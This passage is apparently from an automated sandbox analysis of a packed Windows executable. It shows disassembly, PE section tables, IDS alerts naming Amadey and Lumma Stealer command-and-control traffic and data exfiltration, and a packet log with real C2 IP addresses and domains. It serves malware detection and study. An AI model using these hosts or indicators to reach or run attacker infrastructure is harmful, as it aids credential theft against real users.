                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          or ecx, dword ptr [edx]
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add dword ptr [eax+00000000h], eax
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add ecx, dword ptr [edx]
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3169700x10rlgtiwao
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x3169200x18rlgtiwao
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          0x10000x680000x2de00f5a6346abb50494cfff6df4ab2d27717False0.9981320248637602data7.981358643566328IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          rlgtiwao0x6b0000x2ac0000x2aba00eb0b0ecb25ea5cfb1c3ad1853e25ed44unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          yjhidprh0x3170000x10000x400544ad8c266a1aa4e44ac1d1a10a1a5c8False0.7431640625data5.862949997694122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .taggant0x3180000x30000x22007ea5245026b2f746264c164f96345e14False0.0627297794117647DOS executable (COM)0.7778926834158965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                          RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                          RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                          2024-12-18T09:07:06.026327+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.849709185.215.113.4380TCP
                                                                                                                                                                                          2024-12-18T09:07:11.028065+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84971131.41.244.1180TCP
                                                                                                                                                                                          2024-12-18T09:07:14.901476+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.849710TCP
                                                                                                                                                                                          2024-12-18T09:07:16.245823+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.849712185.215.113.4380TCP
                                                                                                                                                                                          2024-12-18T09:07:17.329177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:17.690884+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84971431.41.244.1180TCP
                                                                                                                                                                                          2024-12-18T09:07:18.080280+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849713104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:18.080280+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849713104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:19.408774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:20.152865+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849715104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:20.152865+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849715104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:21.773714+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:24.062217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849717104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:26.685085+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:28.376125+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.849719185.215.113.4380TCP
                                                                                                                                                                                          2024-12-18T09:07:29.695338+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849721104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:29.827789+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972031.41.244.1180TCP
                                                                                                                                                                                          2024-12-18T09:07:30.441203+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849721104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:32.807815+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849722104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:36.857153+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.849723185.215.113.4380TCP
                                                                                                                                                                                          2024-12-18T09:07:38.095804+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849725104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:38.307666+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972431.41.244.1180TCP
                                                                                                                                                                                          2024-12-18T09:07:38.814729+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849725104.21.23.76443TCP
                                                                                                                                                                                          2024-12-18T09:07:42.955483+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.8545121.1.1.153UDP
                                                                                                                                                                                          2024-12-18T09:07:43.181645+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.8559211.1.1.153UDP
                                                                                                                                                                                          2024-12-18T09:07:44.774360+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849727172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:44.774360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849727172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:44.940259+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.849726185.215.113.4380TCP
                                                                                                                                                                                          2024-12-18T09:07:45.506236+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849727172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:45.506236+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849727172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:46.767356+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849728172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:46.767356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849728172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:47.739835+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849728172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:47.739835+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849728172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:49.409802+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849730172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:49.409802+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849730172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:51.624887+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849732172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:51.624887+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849732172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:54.131066+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849734172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:54.131066+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849734172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:57.092063+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849736172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:57.092063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849736172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:59.595987+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849737172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:59.595987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849737172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:07:59.604881+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849737172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:08:02.921885+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.849740172.67.179.109443TCP
                                                                                                                                                                                          2024-12-18T09:08:02.921885+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849740172.67.179.109443TCP
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Dec 18, 2024 09:07:04.578993082 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:04.698749065 CET8049709185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:04.699554920 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:04.713125944 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:04.834022999 CET8049709185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:06.025878906 CET8049709185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:06.026326895 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.541768074 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.545770884 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.661957026 CET8049709185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:07.662040949 CET4970980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.665319920 CET8049710185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:07.665400982 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.670543909 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:07.790400982 CET8049710185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:09.579338074 CET8049710185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:09.579418898 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:09.584815025 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:09.704366922 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:09.704581022 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:09.704662085 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:09.824217081 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027827978 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027890921 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027926922 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.027982950 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028016090 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028048992 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028064966 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028064966 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028064966 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028065920 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028065920 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028084040 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028167963 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028167963 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028178930 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028209925 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028244019 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028249025 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028268099 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.028302908 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.148468018 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.148508072 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.148658037 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.152442932 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.152497053 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.152514935 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.152575016 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.219002008 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.219129086 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.219166994 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.219290972 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.223176003 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.223274946 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.223279953 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.223349094 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.231610060 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.231698036 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.231750011 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.231811047 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.239947081 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.240041018 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.240072966 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.240269899 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.248362064 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.248471975 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.248492956 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.248559952 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.258342981 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.258492947 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.258522987 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.258585930 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.265233040 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.265311956 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.265325069 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.265388012 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.273533106 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.273611069 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.274070978 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.274131060 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.281985998 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.282087088 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.282144070 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.282175064 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.289670944 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.289724112 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.289743900 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.289783955 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.296853065 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.296914101 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.296988010 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.297044992 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.304460049 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.304548979 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.304687023 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.304770947 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.410301924 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.410502911 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.410712004 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.412596941 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.412724972 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.412806034 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.417427063 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.417589903 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.417680979 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.422266006 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.422307968 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.422327995 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.422396898 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.427145958 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.427181005 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.427248001 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.431385040 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.431457043 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.431464911 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.431524992 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.436388969 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.436527014 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.436593056 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.440500975 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.440608978 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.440690994 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.444782972 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.444870949 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.444993973 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.449542999 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.449592113 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.449666977 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.453618050 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.453759909 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.453879118 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.458055019 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.458359003 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.458425999 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:11.462537050 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.462701082 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:11.462760925 CET4971180192.168.2.831.41.244.11
